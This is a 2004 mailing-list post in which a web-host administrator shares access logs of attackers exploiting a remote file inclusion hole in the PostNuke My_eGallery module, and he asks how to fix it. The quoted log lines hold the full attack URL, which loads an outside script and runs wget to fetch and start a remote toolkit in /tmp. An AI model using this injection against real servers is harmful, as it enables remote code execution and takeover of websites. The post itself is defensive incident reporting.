RE: [cobalt-users] Howto trace hack

["Crocket" <crocket@xxxxxxxxxxx>]

Hi,

The kiddies are trying it again and now I managed to identify them and how
they do it :
They use the Postnuke My_eGallery module to execute the crap from their
site.

www.domain.com 80.96.33.10 - - [19/Mar/2004:12:43:19 +0100] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.mirabela
.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20
-zxvf%20LegendPort.tgz;cd%20LegendPort;./start/modules/My_eGallery/public/di
splayCategory.php?%20basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/
tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%2
0LegendPort;./start HTTP/1.0" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE
5.5; Windows 98; Win 9x 4.90)"
www.domain.com 80.96.33.10 - - [19/Mar/2004:12:43:19 +0100] "GET
/libImage/warning.gif HTTP/1.0" 200 871
"http://xxx.xxx.xxx.xxx/modules/My_eGallery/public/displayCategory.php?basep
ath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.ne
t/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start/module
s/My_eGallery/public/displayCategory.php?%20basepath=http://www.mirabela.net
/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxv
f%20LegendPort.tgz;cd%20LegendPort;./start" "Mozilla/4.0 (compatible; MSIE
5.5; Windows 98; Win 9x 4.90)"
www.domain.com 62.162.59.75 - - [19/Mar/2004:15:53:19 +0100] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.aleksrul
z.com/hack.txt?&cmd=cd%20/tmp;wget%20mirabela.net/LegendPort.tgz;tar%20zxvf%
20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 2861 "-" "Mozilla/4.0
(compatible; MSIE 5.0; Windows 98; DigExt)"

I replaced my domain with www.domain.com and my ip with xxx.xxx.xxx.xxx

They are forcing the basepath which is probably a global in that module.
So they aren't even using a php upload form.
Anyone know quick fix to unset that global ?
If not I will remove those modules from the sites and warn my customers.

John